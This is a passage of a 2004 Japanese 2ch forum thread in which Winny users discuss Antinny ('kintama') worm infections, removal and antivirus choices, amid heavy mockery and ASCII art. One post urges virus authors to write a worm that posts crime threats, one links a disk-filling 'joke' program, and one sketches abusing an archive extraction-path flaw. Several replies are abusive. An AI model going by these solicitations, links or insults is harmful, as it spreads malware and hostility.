>>366の間違いでしたorz
370[名無し]さん(bin+cue).rar:04/11/20 01:58:29 ID:yXx/fi8n
>>368
『RESTORE ウイルス』でググルと良いことあるかも。
371[名無し]さん(bin+cue).rar:04/11/20 01:58:30 ID:4meNplRH
>>368
その場所はシステムの復元が使ってる。
いったん機能をオフにしたら削除できるはず。
ttp://www.symantec.co.jp/region/jp/sarcj/data/w/w32.hllw.antinny.html
372[名無し]さん(bin+cue).rar:04/11/20 02:14:01 ID:3pQJJK14
なんからぶフェチってエロゲー落としたんだけど
ノートン先生にかからないウィルス入ってたー
一応参考までに
373[名無し]さん(bin+cue).rar:04/11/20 02:17:10 ID:1nXF07xG
>>372
バーカ
374[名無し]さん(bin+cue).rar:04/11/20 02:27:10 ID:gv3VBgYh
>>373
アーホ
375[名無し]さん(bin+cue).rar:04/11/20 03:44:40 ID:xGoNz/SP
おまいら今日はアホーにやさしいな。
376[名無し]さん(bin+cue).rar:04/11/20 07:51:54 ID:SH2z+rq9
>>372
何を今更・・・
社員乙
377[名無し]さん(bin+cue).rar:04/11/20 08:17:34 ID:h9DvWdQD
バスターは未だにジョン様ウイルスに未対応のままか
378[名無し]さん(bin+cue).rar:04/11/20 08:38:47 ID:e74M6Lj5
詳しくは言えないがさっき初めてシステムの復元が役に立った
補欠ののび太が道具なしで満塁ホームランを打った感じ
379[名無し]さん(bin+cue).rar:04/11/20 09:24:55 ID:wZFeMnd+
ny専用マシーンをあまったパーツで組んだんだけど
メンイマシーンとnyマシーンをLAN上でファイル共有しても大丈夫かなぁ?
nyマシーンに感染したウィルスがLAN経由で他のPCに感染しそうで怖いんだが
勝手にウィルスがLAN上のPCシステムを書き換えるとか、ないよね?
380倍率ドン ◆spuCn5wBDM :04/11/20 09:26:05 ID:7zpapC1X
メンイマシーン稼動中
381[名無し]さん(bin+cue).rar:04/11/20 10:07:59 ID:4meNplRH
メンマイシーン発動中。
382[名無し]さん(bin+cue).rar:04/11/20 10:29:08 ID:csGWQN9v
マンコマシーン発情中
383倍率ドン ◆spuCn5wBDM :04/11/20 10:34:04 ID:7zpapC1X
俺さ、幼稚園のときのあだ名が「グロマンコ」だったんだよ
384[名無し]さん(bin+cue).rar:04/11/20 10:58:57 ID:ko7MsnWR
>>360
フリーのアンチウイルスソフト Part4
http://pc5.2ch.net/test/read.cgi/sec/1099147218/

フリーでいいからちゃんとインスコして常駐させとけ。
385[名無し]さん(bin+cue).rar:04/11/20 11:38:01 ID:jHKHqMau
>>379
あるよ。隔離しようね。
386[名無し]さん(bin+cue).rar:04/11/20 17:38:18 ID:38mXwYOa
各nyウイルスの作者さん見てる〜?

次はぜひ>>94みたいなのでお願いします。
もちろん感染即カキコなら犯罪予告扱いされなくなるんで、
感染者のうち1名様限定で確実に警察が動くようなネタでカキコするようなウイルスお願いします^^
387[名無し]さん(bin+cue).rar:04/11/20 17:49:54 ID:jr2X9SlD
>>386
「各nyウイルスの作者さん見てる〜?」じゃねぇよ
テメェで作れや。その程度のスキルもねえなら黙ってろや、豚

というわけで豚野郎晒しage
388[名無し]さん(bin+cue).rar:04/11/20 17:59:55 ID:FptbwY+j
>>386
死ぬほど頭悪そうな発言ですね。
389386:04/11/20 18:22:25 ID:cnANQ73c
>>387-388
バカ共は黙ってなさい(^^
nyウイルスの作者さんに言ってるんです。
君達みたいな低脳君には用はないのです^^
390[名無し]さん(bin+cue).rar:04/11/20 18:35:53 ID:hZFe+ydv
>>386-389
どっちもどっちだがなw
391[名無し]さん(bin+cue).rar:04/11/20 19:05:37 ID:GjyqPR4j
最新データーのノートン2003でスキャンして
何も引っかからなかったらscrの方の感染もしてないでFA?
392[名無し]さん(bin+cue).rar:04/11/20 19:06:38 ID:GjyqPR4j
あ、2004だった…
393[名無し]さん(bin+cue).rar:04/11/20 19:17:27 ID:cDpU5JcU
週末は毎回こんな感じだね
394[名無し]さん(bin+cue).rar:04/11/20 19:26:31 ID:c7fNIHJw
【使用OS】xp home
【WindowsUpdateしてるか】no
【AntiVirusは】nyはたまにしか起動しないので入れてない。
【ちゃんとUpdateしてるか】
【スキャンした結果】
【オンラインスキャンしたならその結果は】
【Winnyのバージョン】2b71
【Winny歴、総DL量は】1年 ?
【テンプレを読んだか】yes
【テンプレにある対策を実行したか】yes
【症状か具体的に、分かる限りすべて書く】upフォルダが勝手に作成される。
winnyごと削除してPC再起動後、winny再インストールしてもしばらくすると
再びupフォルダが作成される。
【何をしたらそんなことになったのか】フォルダを不用意に開いたからだと・・・
【これまでにとった措置】上記の通りです。
os再インストールはきついので、駆除方法をよろしくです。
395[名無し]さん(bin+cue).rar:04/11/20 19:32:23 ID:GjyqPR4j
ってか、検出してるし(w
スキャン終わったら報告しますね。
396[名無し]さん(bin+cue).rar:04/11/20 19:32:49 ID:BSdbSqMk
窓から――――投げ捨てろ
397[名無し]さん(bin+cue).rar:04/11/20 19:50:39 ID:Z9aEOdhc
>>387
とりあえずツッ込んでおく

上がってへん上がってへん
398[名無し]さん(bin+cue).rar:04/11/20 21:01:30 ID:hZFe+ydv
>>394
本来ならスルーすべきところをマジレスしますが、

・AV入れてないならオンラインスキャンしてから来てください。
・Windows Updateくらいしてください。
・AVはnyのためだけに存在するわけじゃないので、入れましょう。
金を払いたくなければフリーのAVでいいです。
・最低限の事が出来ないような奴は結果的に他のユーザーの迷惑
になるのでnyやめてください。
399[名無し]さん(bin+cue).rar:04/11/20 21:16:17 ID:PTftiYBH
バスターのパターン257にWORM_ANTINNY.Wってあったんだけど
これって仙台きんたま?
400[名無し]さん(bin+cue).rar:04/11/20 21:30:10 ID:+iXp9sLQ
週末は釣りが多いなあ
401[名無し]さん(bin+cue).rar:04/11/20 22:00:46 ID:23puu4HN
nyをたまにしか起動しないからAV入れないって発想がryユーザー独自の考え方
402[名無し]さん(bin+cue).rar:04/11/20 23:22:58 ID:kjaxWKpQ
窓でny使うやつってこんなんばっか
403[名無し]さん(bin+cue).rar:04/11/20 23:36:52 ID:E+8fwWH/
まあ、窓でAV使ってないこと自体が既にダメ過ぎ。
メーカーパソコンの期間限定AVを、そのまま使って期限切れしてる
やつが、想像以上に多いこんな世の中じゃ(ry。
404[名無し]さん(bin+cue).rar:04/11/21 00:36:21 ID:LRfddmwz
質問テンプレにある【AntiVirusは】ってノートンのアンチウイルスソフトのこと?
405[名無し]さん(bin+cue).rar:04/11/21 00:45:26 ID:2zvnW/Kf
ノートン(Norton)の「N」が見あたらないんだが君はどう思うかね?
406[名無し]さん(bin+cue).rar:04/11/21 00:46:57 ID:4ts/6YzF
わけわからん。なぜそうなるのか。
407[名無し]さん(bin+cue).rar:04/11/21 04:04:58 ID:IT1JH+WM
WinnyFileDatabase繋がらなくなってたのかっ……
408[名無し]さん(bin+cue).rar:04/11/21 06:46:58 ID:PqCKwaRn
ダウンロードしたzipファイルをスキャンしたら「Worm/Antinny.A」が
検出されたんだけど解凍していないから大丈夫なんですよね?
ファイルごと削除してスキャンしたらウイルスは検出されなかった
念のためシマンテックのオンラインスキャンしても検出されなかった
自分の使っているのはAGVです

409[名無し]さん(bin+cue).rar:04/11/21 06:52:49 ID:/wf7bRwO
聞く前に調べればぁ?
検出の意味わかってんの?
暇だから釣られてやるよ
410[名無し]さん(bin+cue).rar:04/11/21 07:03:35 ID:PqCKwaRn
>>409
釣りじゃないです
削除だけで大丈夫なのか心配なんです
自分のデータがnyに流れてしまうみたいですし
411[名無し]さん(bin+cue).rar:04/11/21 07:29:58 ID:5vJhlwWj
ウィルスを実行していないのなら感染してないはず
412[名無し]さん(bin+cue).rar:04/11/21 07:38:31 ID:3bBxlrTH
ややユーモアに欠けますな
413[名無し]さん(bin+cue).rar:04/11/21 07:46:40 ID:csJ2oXXG
そもそもどこのAntinny.Aがデータ流出させるんだ?
414[名無し]さん(bin+cue).rar:04/11/21 09:32:38 ID:RYcIvqEs
415[名無し]さん(bin+cue).rar:04/11/21 13:34:59 ID:U+5NY75p
.scrのウイルスやっとバスター対応したんだね
Antinny.vってでたけどまだ情報はない
416[名無し]さん(bin+cue).rar:04/11/21 16:20:43 ID:QbMHneKs
VIPで面白い事やってたよ

デスクトップ上に新規フォルダって何個作れるかやってた
ttp://vipper.zive.net/vip/img/vip897.jpg
ttp://vipper.zive.net/vip/img/vip898.jpg
ttp://matsuya.dyndns.tv/2ch/img-box/img20041121160056.jpg


43:よーし、パパ  自動フォルダ作成プログラム作っちゃうぞ!!
やたーー 自動フォルダ作成プログラムできたよーー
最新版:49uper.com:8080/html/img-s/24086.zip パスは vip 

nyにも流してるらしいw
ジョークソフトだけど結構怖いんじゃないかな
417[名無し]さん(bin+cue).rar:04/11/21 16:56:03 ID:4mL2tJXu
system権限だけでシェルからじゃ消せないファイルを大量生産してディスクを埋める
ってのは怖いな。
418[名無し]さん(bin+cue).rar:04/11/21 19:48:56 ID:uuJiqLoq
ZIPを解凍して、出てきたフォルダ(解凍ツールが自動で作ったものかも)
の中にexeファイルが置いてあって(フォルダ自体は実行ファイルじゃなさげ)
そのフォルダ開いただけで、その中身のexe自体は実行してないのにAntinny.H感染しますた。
これってどういう仕組みになってるんですか?
419[名無し]さん(bin+cue).rar:04/11/21 19:54:39 ID:p/Sdao8e
そのzipがexeだった
420[名無し]さん(bin+cue).rar:04/11/21 20:08:47 ID:XWVGiYnD
>>418
展開先を任意のところにできるという脆弱性があって、
それを利用して展開先をスタートアップにしておけば、次回起動時に感染。
421[名無し]さん(bin+cue).rar:04/11/21 20:37:48 ID:uuJiqLoq
>>419
もう一度確認してみましたけどやはりそれではないようです
>>420
解凍ソフトは最新のLhaplusで、その脆弱性には対応済みということなので
たぶんそれでもないかと
422[名無し]さん(bin+cue).rar:04/11/21 20:46:05 ID:ylPvfHLH
>>421
フォルダが実行ファイルでないのはどうやって確認した?
423[名無し]さん(bin+cue).rar:04/11/21 20:58:33 ID:Vf5qCsve
AVがウィルス発見≠感染だけど本当に感染してた?
424[名無し]さん(bin+cue).rar:04/11/21 21:19:07 ID:uuJiqLoq
>>422
ファイル名に怪しい所がないので
もちろん拡張子表示してます
>>423
AVってAVGのことですか?
だとすると、自分もAVG起動してスキャンしても何も見つかりませんでした
でも、ファイル上で右クリックスキャンすると発見されるんです
よく調べたらAntinny.H2つとPariteがありました

Antinny.Hはぐぐっても情報少なくて怖い(((( ;゚д゚)))ガクガクブルブル
425[名無し]さん(bin+cue).rar:04/11/21 21:28:33 ID:uuJiqLoq
あ、あとそれとウィルス警告(Antinny.H)が出ます
今すぐAVG起動してスキャンしろみたいな
でもスキャンしても何も見つからない
426[名無し]さん(bin+cue).rar:04/11/21 21:48:00 ID:p/Sdao8e
それ感染してへんやろ
427[名無し]さん(bin+cue).rar:04/11/21 21:51:38 ID:ylPvfHLH
ウイルスが隔離された警告を感染したと思うやつってアンチウイルスソフトをなんだと思ってるんだろ
428[名無し]さん(bin+cue).rar:04/11/21 22:39:55 ID:2zvnW/Kf
知識が足りなく、それに気づいてないようです。
ここで質問する以前の問題。
(つーかここ質問スレじゃねーし。)

不慣れだと自覚している人なら、
「よけいかな?」と思うくらい細かく書いた方がいいですよ。
429[名無し]さん(bin+cue).rar:04/11/22 00:05:35 ID:+szyJvuU
なんか自分に落ち度はなくて未知の方法で感染したとでも思ってんのかね
430[名無し]さん(bin+cue).rar:04/11/22 00:12:08 ID:WRdUoLH8
ズブシロ〜半可通で普遍的に見られる「うちの子に限って症候群」ちゃうか?
因果応報は世の常だと言うのにな
431[名無し]さん(bin+cue).rar:04/11/22 02:11:40 ID:C2L+WtEe
>>424
AVはアダルトビデオでもオーディオビジュアル機器でもないぞ。よく考えろ。そして歌え。
432[名無し]さん(bin+cue).rar:04/11/22 02:33:18 ID:bo+bx82J
最近の香具師はウィルスを発見しただけで感染したっと、思う人が多いみたいだな
433[名無し]さん(bin+cue).rar:04/11/22 02:36:14 ID:6nVmUQXe
週末症候群とでも呼ぼうか…。ったく、どのスレでもこうだな
434[名無し]さん(bin+cue).rar:04/11/22 09:53:45 ID:8z5G9Tgw
SP2はウィルス
435[名無し]さん(bin+cue).rar:04/11/22 10:07:24 ID:B9AZLmgc
>>434
うちもSP2を当てたらVisualStudioがおかしくなった。
debug権限が無いからコンパイルできませんとか言いやがる。
VSの再インスコで直ったけど、他のマシンにSP2は入れられない。

年度末のリカバリーで、SP2当ててからアプリ入れることにするよ。
436[名無し]さん(bin+cue).rar:04/11/22 11:00:17 ID:bsPQtV6O
そういや俺もSP2入れてからなんか調子わりーなーと思って
SP2アンインストールしたらPCそのものが立ち上がらなくなったよ
リカバリーしたっけなー面倒だったなー
437[名無し]さん(bin+cue).rar:04/11/22 11:16:42 ID:Ybt1CLG+
■xpのsp2を入れたらOS再インストールが出来ない? (@IT会議室)
http://www.atmarkit.co.jp/bbs/phpBB/viewtopic.php?topic=15700&forum=6
俺もこんな感じになった
どうにか再インスコしたけど、なんか調子悪い
438[名無し]さん(bin+cue).rar:04/11/22 14:36:14 ID:YwUw1FB1
【使用OS】xp home
【WindowsUpdateしてるか】してるがSP2は入れてない。
【AntiVirusは】McAfee
【ちゃんとUpdateしてるか】してる
【スキャンした結果】ウイルス検出なし
【オンラインスキャンしたならその結果は】
【Winnyのバージョン】2b71
【Winny歴、総DL量は】半年 300G位
【テンプレを読んだか】yes
【テンプレにある対策を実行したか】yes
【症状か具体的に、分かる限りすべて書く】シマンテックのオンラインスキャン(ウイルス検出)をしようとするとエラーが出てIEが落ちてしまいます
同社のセキュリティスキャン&トレンドマイクロのオンラインスキャンは普通に出来んですが・・・これはウイルスでしょうか?
439[名無し]さん(bin+cue).rar:04/11/22 14:41:41 ID:q0Fyz59X
なぁ…
ここはウィルスなんでも相談スレじゃないんだよ…
440[名無し]さん(bin+cue).rar:04/11/22 15:15:02 ID:B9AZLmgc
つーか、ウイルス以前の問題のような気もするが。
「エラーが出てIEが落ちる」って、それだけで原因が特定できる?

とりあえずクッキーキャッシュ全クリアしてみれ。
あとは初心者スレで半年修行してからだ。
441[名無し]さん(bin+cue).rar:04/11/22 15:31:26 ID:YwUw1FB1
>>440
ども。クッキー消してもダメみたいです。初心者板行きます。
442[名無し]さん(bin+cue).rar:04/11/23 12:45:06 ID:llJ37m0b
最近少ないね
443[名無し]さん(bin+cue).rar:04/11/23 13:32:55 ID:JCjy9HCa
>>442
いや、前が異常に多すぎただけ。
444[名無し]さん(bin+cue).rar:04/11/23 13:43:13 ID:5bi48gCQ
原因がわからなく困ってるので質問させてください。

【使用OS】 Win2000
【WindowsUpdateしてるか】 yes
【AntiVirusは】 なし
【Winnyのバージョン】 v2.0b7.1
【Winny歴、総DL量は】 100G未満
【テンプレを読んだか】 yes
【テンプレにある対策を実行したか】 yes
【症状か具体的に、分かる限りすべて書く】
シャットダウンさせるときに必ず「explorer.exeを終了させています」と出てしまい正常に終了できません。
終了を待ってみるとビジー状態で「すぐ終了」か「キャンセル」が出てどちらを選んでも
次回起動時アクティブデスクトップが無効になっていて戻す作業が必要。

【何をしたらそんなことになったのか】
>>1にある対策サイトttp://nyweb.hp.infoseek.co.jp/の内容を実行した
それ以外は何もしていないと思われる。

【これまでにとった措置】 特になし。

レジストリをいじったあたり自己責任なのはわかってますがこれを直す方法はあるんでしょうか?
なるべくならOS再インストはしたくないと思っているので・・・。
445[名無し]さん(bin+cue).rar:04/11/23 13:53:04 ID:IRXYmXVm
【AntiVirusは】 なし

この時点で、おまいはここにいる資格が無い。
そのうえ、ウイルスに感染したかどうかも不明で、オンライン
スキャンの結果すら明記しない。これで答えられるやつは神。
446[名無し]さん(bin+cue).rar:04/11/23 13:55:04 ID:SxFMYyjm
確かに。レジストリいじったのが直接の原因かもしれないしな。ウイルススキャンしてその上で
対処としてレジストリいじったのかどうかもわからん。
447[名無し]さん(bin+cue).rar:04/11/23 14:06:36 ID:S5pX+Iax
つーかOS異常?なのにOSインスコヤダってアホだろ
448[名無し]さん(bin+cue).rar:04/11/23 14:17:59 ID:3s741UqM
>>444
        / /      '" /    / ,,-、 /、ヽ\  ゙i;,-''"   / ./  /─''''" ̄ ,,/
    /  ./ /   ,,,-‐'"-/   / ./ ゙" "\  ゙i;,  | 、// /   "    ,,,/
       / ,-''/ /    ,,-''"_ /   //       ヽ  l /  レ'/~       /‐/
      / /  | l|  ,,-'"/゙/,」|    /    ..::;;;,,,  }  /   |~ ,,-‐,,,-'''  //~
     / /-'''''| | /l /‐'''/'' .人   i'    .:: :;'" / / l  ノ゙i// ,,-‐'"──==
     //'"   ゙i;: | /‐' ./,, ,,ノ ゙i;,.  |     _,,-ヾ.// ノ ,-''" l |  ‐'"   ,,,-‐二
     レ'     ヽl:i' ./  )'、‐,\゙i;: | ,,,-‐二-┬ナ" /‐'"‐ 〉 ,i'───'''" ̄~-''"
         ,-‐',ヽ|'"  ./゙ヽ-ゝ='\゙i,'''ヽ -゙=‐'   '" ,‐'ノ,, /‐''" ,,-‐'''"~
        / / ;;:.  ──ヽ, ゙i;'''''' , ゙ "-‐'''''"""    〔_,/ ゙ヽ'-'"~    おめえ頭おかしいんじゃねえか?
       / /   / ,; ,,_}_  ゙、 ./__,,  _,,       /      \
      ,;'  / ,;;;:;:/;: ,,   ~ ヽ ヽ.  ヽニ‐'、     / /       ゙i,_    初心者板へ行ってきな。
    ./        ''  ,l,,,,,,/ 〉  ゙ヽ、 '''' :;l  ,,-''" /        ゙i.\
    /          / ヽ /     ゙ヽ、--イ~;;:'" //   ::;:;:;:   | \
   i          /  ̄ ゙̄"          |;:" //            ヽ-‐'''"~l|
  ./    ゙''''ヽ、,,-‐''"              .i /,;'"   _,,,,,,,,,_,,,-‐'''-''"~     |
 (" ̄"'''''‐--、,,_i'                 // '",,-─'''"  ,,,-‐'",-‐'"  ,,,,-‐ .___|
 i' ゙'':::::::::::::::::::::::}                _/''-'''"~   ,,,-‐'",,-'''"  ,,,-‐二-‐''''"   ゙ヽ
449444:04/11/23 14:22:43 ID:5bi48gCQ
なるほど・・・。
ウイルスソフトは期限切れてアップデートできなくなったから削除してしまいました。
症状からAntinnyだと思いオンラインスキャンでAntinnyと出てきたので対策を実行したんです。
OS異常なのかなんなのかわからないので同じ症状になった人の情報を聞いてもしかしたら直せるかなと希望を込めて質問しました。

と思ったらウイルスソフト入れてなきゃここで質問する意味はないのでしたか_| ̄|○
お騒がせしました。
450[名無し]さん(bin+cue).rar:04/11/23 14:24:02 ID:Ht7XOw1G
アップデートできなくなったから消すってのも大胆だな
451[名無し]さん(bin+cue).rar:04/11/23 14:27:37 ID:sCNvSXi9
俺もアンチウィルスソフト入れてないよ
システムパーティションのバックアップ取って
おかしくなったら寝てる間にバックアップから復旧してる
まぁ使ったためし殆ど無いけど
452[名無し]さん(bin+cue).rar:04/11/23 14:36:47 ID:IRXYmXVm
>>449
ここはワクチンで検出できない、ウイルスっぽいものが出た
時に賑わうところだからな。フリーのアンチウイルスでも無
いよりはずっとマシだから入れておけって。

あと、Antinnyにも亜種がいっぱいあるし、ワクチンメーカー
によって呼称が異なることもままある。症状を正確に把握し
て、正しい対処を行わないと意味が無い上に悪化させる。
453[名無し]さん(bin+cue).rar:04/11/23 14:40:31 ID:kj4Inpzc
>>451
そういう問題じゃないと思うんだが……。

おまえみたいな馬鹿が既存のキンタマの
餌食になったりするんだろうな。
454千年うんこ ◆UNKOg/MQDY :04/11/23 15:12:11 ID:cPzHMsQd
Freeでも入れてないよりずいぶん安心だと思うんだけどね
AVGも新しくなったし。

まあ、最近はウィルスよりスパイウェア・アドウェアの方がたち悪いけど
455[名無し]さん(bin+cue).rar:04/11/23 22:53:52 ID:1vArU0hU
>>337
なかったよ
456[名無し]さん(bin+cue).rar:04/11/24 01:20:10 ID:V0IOOtbI
てs
457[名無し]さん(bin+cue).rar:04/11/24 03:35:30 ID:IulHW5KP
>>58
私も特に怪しい.exeを起動した覚えがないのに
>>58と同じような症状で困っております。

私の場合はC:\_RESTORE\ARCHIVE内のFS144.CABに
ANTINNY AがあるとオンラインスキャンとAVGにて判断されました。
レジストリや.iniなど見てもテンプレに当てはまるものがなく
削除等の対応ができません。
一応テンプレサイト等もよく見たのですが解決できませんでした。

よろしければご回答よろしくお願いします。
458[名無し]さん(bin+cue).rar:04/11/24 04:16:58 ID:JsWTyE85
窓から(ry
459[名無し]さん(bin+cue).rar:04/11/24 04:34:17 ID:G5ePzT6R
>>457
 このスレをRESTOREで検索しろ ほんの100レスぐらい前に答えてもらってる人がいる
460[名無し]さん(bin+cue).rar:04/11/24 04:43:17 ID:SSO0SJHA
すみません、前にHDDの内容が消えて起動できなくなったことについて
いろいろと親身にお答えいただきました。
で、今思うと、リカバリCDを使ってた事を忘れました。リカバリって
いっぺん、HDDをフォーマトするんですね。^^;
461[名無し]さん(bin+cue).rar:04/11/24 05:12:41 ID:T3MVIImQ
質問なんですけど

・デスクトップ上のファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh という名前でupフォルダに置く。

とありますが、もしデスクトップに10ギガ以上データを置いていた場合、それら全てがうpフォルダにまとめられるのでしょうか?
それとも適当なサイズでまとめられるのでしょうか?
どなたか教えて頂きたいです。
462[名無し]さん(bin+cue).rar:04/11/24 05:14:30 ID:JsWTyE85
ここは(ry
463[名無し]さん(bin+cue).rar:04/11/24 05:24:46 ID:Vdda/8ee
>>461
実験して報告してくださいね
464[名無し]さん(bin+cue).rar:04/11/24 05:53:48 ID:1lU/JuEf
>>461
2Gずつに分割されて
[キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ)part1.lzh
[キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ)part2.lzh
…という風にUPされます。
465[名無し]さん(bin+cue).rar:04/11/24 09:33:16 ID:KrmA1RXc
>>464
有り難うございます

そういえばC:\Documents and Settings\ユーザー名\Local Settings\Tempに
「hsperfdata_ユーザー名」と言うフォルダがあるのですが、
これはどうなのでしょうか?ここに「ユーザー名.txt」見たいなのがあったらまずいのですよね・・
466[名無し]さん(bin+cue).rar:04/11/24 09:41:46 ID:+Oqk7CUI
>>465
そのキーワードでググると答えが書いてある。
467[名無し]さん(bin+cue).rar:04/11/24 09:50:00 ID:KrmA1RXc
>>466
有り難うございます
どうやら関係なさそうですね
468[名無し]さん(bin+cue).rar:04/11/24 10:35:43 ID:gcL8So6K
なんかパソコン起動してると不定期にシステムのシャットダウンとか表示されて
パソコンの電源を消される。いつもは消される前に自分から電源切って
て気づかなかったがこれはもしかして電源を切られてるんじゃなくて再起動され
ようとしていたということなのかな?だとしたら>>10で書かれてるウイルスに感染
したということなんですかね?長文でなおかつ頭割るそうな文でスマソ。
469[名無し]さん(bin+cue).rar:04/11/24 11:12:23 ID:Qni0m5ui
本人は釣る気はないんだろうけどこっちにしてみりゃ釣り以外の何者でもないな。
470[名無し]さん(bin+cue).rar:04/11/24 11:35:48 ID:TzodHYXZ
>>468
「システムのシャットダウン」でぐぐると幸せになれるね。
初心者板を半年ROMってから、ここにくるとバカにされずに済むかも。
471[名無し]さん(bin+cue).rar:04/11/24 13:16:58 ID:gcL8So6K
>>470
ありがとうございます。
472[名無し]さん(bin+cue).rar:04/11/24 17:10:37 ID:2mBdtLVd
HDDを新しくした
もうウィルスばら撒くなよ
473[名無し]さん(bin+cue).rar:04/11/24 18:06:25 ID:y1sSkTL+
デフォルトでシャットダウンが有効になってるメーカーがあるとすればとんだ糞メーカーだな
474[名無し]さん(bin+cue).rar:04/11/24 21:20:39 ID:cZortsbr
upフォルダに[仙台ギャラクシーエンジェルズ] [俺のデスクトップ]
PCのユーザー名と言う名前の画像があったのですがたぶん↑に書いて
あったキンタマという名前のウイルスだと思うのですがwinnyフォルダ
をまるごと消そうとしても「使用中です」とかいう警告メッセージがで
て消せません。どうすればよいのかどなたか教えていただけませんか?
475[名無し]さん(bin+cue).rar:04/11/24 21:26:35 ID:ytZvBvcX
窓から自分を投げ捨てろ
476[名無し]さん(bin+cue).rar:04/11/24 21:26:52 ID:/AbDYZBN
>>474
よーしよし、そのままネットに接続してろよ〜
今、おまいのディスクトップ画像をgetしてやるからな〜
477[名無し]さん(bin+cue).rar:04/11/24 21:28:43 ID:R0xmKv4R
1からレスをすべて読んでこい
478[名無し]さん(bin+cue).rar:04/11/24 21:39:17 ID:rpZFaEv2
>474
クリーンインストールすればOKだよ
479[名無し]さん(bin+cue).rar:04/11/24 21:39:59 ID:GLnwPWW0
こうしている間にも>>474のデスクトップ画像が
今も流れているのであった…
480[名無し]さん(bin+cue).rar:04/11/24 21:42:04 ID:KFdCuPaj

  ヽ、.三 ミニ、_ ___ _,. ‐'´//-─=====-、ヾ       /ヽ
        ,.‐'       ヽ:::::::/         ゝ‐;----// ヾ.、 >>474 …up…あを…て
       [          }二          |.r-'‐┬‐l l⌒ | }
        ゙l         リ ̄ヽ         |l:::::::::::!ニ! !⌒ //
.         i        ソ;;:..  ヽ、._     _,ノ':::::::::::::::::ゞ)ノ./
         ` ー==--‐'´(__,.   ..、  ̄ ̄ ̄  :::::::::::::::::i/‐'/
          i:::::::::::::      .:::ト、  ̄ ´     ::::::::∪::::::l、_/::|
          !::::::::::::                :::::::::::::::::::::|:::::::::::|
             ヽ:::::::::::   --───--   :::::::::::::::::: !::::::::::::ト、
 
481[名無し]さん(bin+cue).rar:04/11/24 21:42:35 ID:KFdCuPaj
        ,   / `ー---─一''"~´ ̄`ヾヽ
      i  i| ilレ           ミミミミ''"`─- 、
    , .,i! i !/i  i         ミミミミヾ   ミヾ ゙ヽ
    .i  ,!i l.| ' i  ゞ       彡ミミミヾ   ミヾヾ  `ヽ
  ,  i!、k ヽ、 ヽ          彡ミミ   ミヾヾ    ゙
  li l ヾ、    ヾ        _,,==  ミヘベ
  , |i、ヽ  ヽ、     ヽ             ヾ ゙
  !ヾ ヽー- _ ー- ,,__         〃ヾ
  ヾヽヾ ‐- ,,___             /ソツ、ヾゞ、ヾヾ
   ` 、`ー- 、...,,─--  __,,     彡ソソ ヾゞゞミミ
  ヽ.、 `ー --- .,,─--  __,, 彡ソソノ,;  ,,-弋ミミミミ
    \ ゙ー‐- 、..,,,____,,. --彡彡彡'"'",ィ'-====、ヽミミミ
      ``,.-、-─r,=====、:;;,,::;;::f" ,.'i´ o`i 冫ヽ ]-'´ ∧∧
         ゙iヾ ニill 〈 (.O)ーi` ̄´i  _`_-_'....'  li ゙_/   ヽ
        ゙i   ill::::::::;ー-‐γ'i'::l,⌒ヾ`)::::::::::;;''  〃u \
        ゙i  :ill::::::::;;  ソ::::;i,、,  ヾ:::::::;''' _,,ノ'  ,r-|
         ゙i、  ゙`‐=='"..::::::;i,, .,,,  ゙゙'''''"~´    l_| そうか!!!!!
          ヾ.イ        '''"..-一、   u   .lヽ
            ヽ     :;;l ̄´ _,,,...,.ヽ     ,イ_〉 わかったぞ!!!!!
             ゙i. u   ;;iェ'´ i'  ヾト!    ./:! \
              ゙!.    :;;Fi、   ,,.ツ   ./;:;:  ゙i そうかそういうことだったのか!!!!!
             ./゙i ヽ   ゙;ヽニ二ニ-'´  ./ :;:;  / ヘ
            / i  ヽ    :..,,-‐' /::;'  ;:; /  /∨\/
482474:04/11/24 22:19:29 ID:cZortsbr
system32フォルダにsvchost.exeがあったのですが消せません。
483[名無し]さん(bin+cue).rar:04/11/24 22:25:14 ID:ytZvBvcX
PCを叩き壊せ
484[名無し]さん(bin+cue).rar:04/11/24 22:28:12 ID:R0xmKv4R
>>482
レジストリから消せ、自己責任で。
485[名無し]さん(bin+cue).rar:04/11/24 23:02:27 ID:qIctCCKw
クリーンインスコしろと何度言ったら
486[名無し]さん(bin+cue).rar:04/11/24 23:08:09 ID:pOne+sVm
>482
新しいハードディスクにしたばかりでnyやってないけどあるぞ
487[名無し]さん(bin+cue).rar:04/11/24 23:12:15 ID:8E5Pc5EA
落としたファイルにThumbs.dbってのがあったんですけど
これってウィルスですか?
今の所症状もなくて、ウィルススキャンにもひっかからないのですが・・・
488[名無し]さん(bin+cue).rar:04/11/24 23:13:26 ID:R0xmKv4R
>>487
ググレ!ググって死ね!
489[名無し]さん(iso+mds).rar:04/11/24 23:18:57 ID:OQVidwxB
>>487
クリーンインスコしろと何度言ったら
490[名無し]さん(bin+cue).rar:04/11/24 23:20:36 ID:X7n/eT/7
取りあえず>>482はネタ振りしたID:KFdCuPajの意を汲むべき
491[名無し]さん(bin+cue).rar:04/11/24 23:21:44 ID:ytZvBvcX
学校の授業でちゃんと説明しとけ、ボケ教師ども
492[名無し]さん(bin+cue).rar:04/11/25 00:04:52 ID:6uJWG1Eh
>487
     __  ○ __
      __\    |    ∠--──-
    ̄ ̄   ̄/⌒`゙': 、
        /  , -.、  `゙': 、
        〈  i   }     `ヽ.     京            ,ィ⊃  , -- 、
          `ヒゝ-''"二ニニニ=ノ     都   ,r─-、      ,. ' /   ,/     }
         /´ _゙‐- ''" ,. ‐-、. ヽ     府  {     ヽ  / ∠ 、___/    |
       _r‐v ,'"7゙ヽ  / ぐ .i  `,    警  ヽ.      V-─- 、  , ',_ヽ /  ,'
    _/ i .i i F‐ } i ┌ ヽ}  i    ハ    ヽ  ヾ、  ',ニ、 ヽ_/ rュ、 ゙、 /
    /i i  i i,,..!-,┴、こ‐-、/   i    イ     \  l  トこ,!   {`-'}  Y
    l ` / !  ,/    \__   /     テ      ヽj   'ー'' ⊆) '⌒`  !   K
     Y_,,. -‐''"_,,,.. -‐'",,..ノ  /     ク        l     ヘ‐--‐ケ   }   札
   (´,.-‐ニニ=、-─‐-''",. -‐'"´7、     相        ヽ.     ゙<‐y′   /   で
.    `゙ゝ〈 /\ヽフニく ̄./ 「`y´ \   談     (ヽ、_,.ゝ、_  ~  ___,ノ ,-、  聞
       |  ヽ<,.>-‐ニ-‐''" i   i   室     )           ノ/`'ー-' <  く
